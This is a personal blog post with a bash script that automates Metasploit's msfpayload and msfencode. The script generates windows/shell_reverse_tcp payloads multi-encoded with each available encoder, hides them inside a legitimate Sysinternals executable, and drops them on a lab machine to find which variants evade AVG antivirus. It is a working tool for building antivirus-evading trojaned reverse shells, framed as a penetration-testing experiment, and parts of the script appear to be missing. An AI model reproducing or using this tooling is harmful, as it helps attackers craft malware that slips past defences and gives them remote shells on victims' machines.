Sunday, November 23, 2014

msfencode bash script - Test encoding with up to 5 iterations

I was reading in the book "Metasploit - A Penetration Tester's Guide" about encoding the payload and also multi-encoding the payload so I wanted to create a bash script to go through all the possibilities of the encoders with up to 5 iterations.  Then in the script copy it over to a file share on a Windows XP SP3 computer with AVG installed.  The AVG would then detect if it was a virus.

Curious how this would work and kicked out the following script. 

# File that contains the encoders that are available to msfencode

# Folder where the SYS Internals Suite EXE files are located

# Log file where how the payload was created and the filename of the payload

# Number of iterations to run the encoding through

# Bash script to create various payloads that are multi-encoded and test them against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfpayload options
# Payload: windows/shell_reverse_tcp
# LPORT: 8080

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs // /mnt/payloadTest -o "username=malware,password=malware"

# Loop through the available encoders in msfencode.listEncoders
while read listEncoders
    # Work through various iteractions allowed for the encoding
    for (( i=2; i<=$iterationCount; i++ ))
        msfpayload windows/shell_reverse_tcp LHOST= LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k
        # If the test.exe fails to be created then skip over the remaining commands
        if [[ -f "/root/multiEncoder/outputFiles/test.exe" ]]; then

            # Create a random 64 character filename to use as the destination file
            randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`

            # Save the information to a log file in the event the encoding bypasses the AV
            echo "${randomFileName}.exe - msfpayload windows/shell_reverse_tcp LHOST= LPORT=8080 R | msfencode -t exe -x /root/multiEncoder/sysInternals/exe/procexp.exe -o /root/multiEncoder/outputFiles/test.exe -e ${listEncoders} -c ${i} -k" >> $logFile

            cp -f /root/multiEncoder/outputFiles/test.exe /mnt/payloadTest/${randomFileName}.exe
            cp -f /root/multiEncoder/outputFiles/test.exe /root/multiEncoder/archiveFiles/${randomFileName}.exe
            rm -f /root/multiEncoder/outputFiles/test.exe

        # End If for the text.exe file not being created
    # Done for the loop on the iteractionCount

done < /root/multiEncoder/msfencode.listEncoders

No comments:

Post a Comment

Powershell - Gather Mapped Drives from a List of Computer Names

I created the following Powershell script to gather remotely the mapped drives that users had in their profiles.  I had to create the script...